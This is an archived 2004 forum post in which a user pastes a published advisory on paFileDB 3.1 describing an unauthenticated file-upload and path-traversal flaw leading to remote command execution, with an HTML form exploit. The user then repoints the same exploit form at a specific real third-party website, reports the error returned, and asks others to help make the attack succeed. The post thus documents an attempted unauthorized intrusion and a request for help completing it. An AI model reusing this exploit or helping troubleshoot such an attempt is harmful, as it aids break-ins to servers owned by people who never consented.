|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 49
Members: 0
Total: 49
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Help me to resolve this pro |
|
Posted: Thu Dec 23, 2004 3:31 pm |
|
|
Dora |
Regular user |
|
|
Joined: Dec 21, 2004 |
Posts: 10 |
|
|
|
|
|
|
|
I have just found a bug and exploit of paFileDB Version 3.1
Code:
============================
Security REPORT paFileDB 3.1
============================
Product: paFileDB Version 3.1 (and earlier)
Vulnerablities: arbitrary file-upload, path-traversal, arbitrary OS command-execution
Vuln.-classes: http://www.owasp.org/asac/parameter_manipulation/forms.shtml
http://www.owasp.org/asac/input_validation/os.shtml
http://www.owasp.org/asac/input_validation/pt.shtml
Vendor: php arena (http://www.phparena.net/)
Vendor-Status: contacted thru mailform (http://www.phparena.net/mail.php) 26.06.2003
Vendor-Patch: http://forums.phparena.net/index.php?act=ST&f=26&t=2170
Exploitable:
Local: NO
Remote: YES
============
Introduction
============
(taken from website)
---*---
paFileDB is designed to allow webmasters have a database of files for download on their site. To add a download, all you do is upload the file using FTP or whatever method you use, log into paFileDB's admin center, and fill out a form to add a file.
---*---
=====================
Vulnerability Details
=====================
1) ARBITRARY FILE UPLOAD
========================
the script "/includes/team/file.php" (and maybe others) does not check for a valid session.
therefore it is possible to upload arbitrary files by creating/modifying a single form-parameter.
Form-example:
---*---
<html><body>
<form ENCTYPE="multipart/form-data" method="POST" action="http://srv/pafiledb/includes/team/file.php">
<input name="userfile" TYPE="file"><br>
<input name="userfile_name" TYPE="text" value="../../../uploads/makeawish"><br>
<input type="hidden" name="action" value="team">
<input type="hidden" name="tm" value="file">
<input type="hidden" name="file" value="upload">
<input type="hidden" name="upload" value="do">
<input type=submit name=submit value="doit">
</form>
</body></html>
---*---
2) ARBITRARY OS-COMMAND EXECUTION
=================================
by uploading program- or script-files.
Severity: HIGH
=======
Remarks
=======
typical php-upload problem
====================
Recommended Hotfixes
====================
software patch.
EOF Martin Eiszner / @2003WebSec.org
=======
Contact
=======
WebSec.org / Martin Eiszner
Gurkgasse 49/Top14
1140 Vienna
Austria / EUROPE
mei@websec.org
http://www.websec.org
I plan to upload some arbitrary files .
Here is my exploit :
Code:
<html><body>
<form ENCTYPE="multipart/form-data" method="POST" action="http://www.vnonlines.com/download/includes/team/file.php">
<input name="userfile" TYPE="file"><br>
<input name="userfile_name" TYPE="text" value="../../../uploads/makeawish"><br>
<input type="hidden" name="action" value="team">
<input type="hidden" name="tm" value="file">
<input type="hidden" name="file" value="upload">
<input type="hidden" name="upload" value="do">
<input type=submit name=submit value="doit">
</form>
</body></html>
But I get an error :
Fatal error: Call to undefined function: doublecheck() in /usr/local/pem/vhosts/17426/webspace/httpdocs/download/includes/team/file.php on line 32
Pls help me resolve this problem
Thank alot |
|
|
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|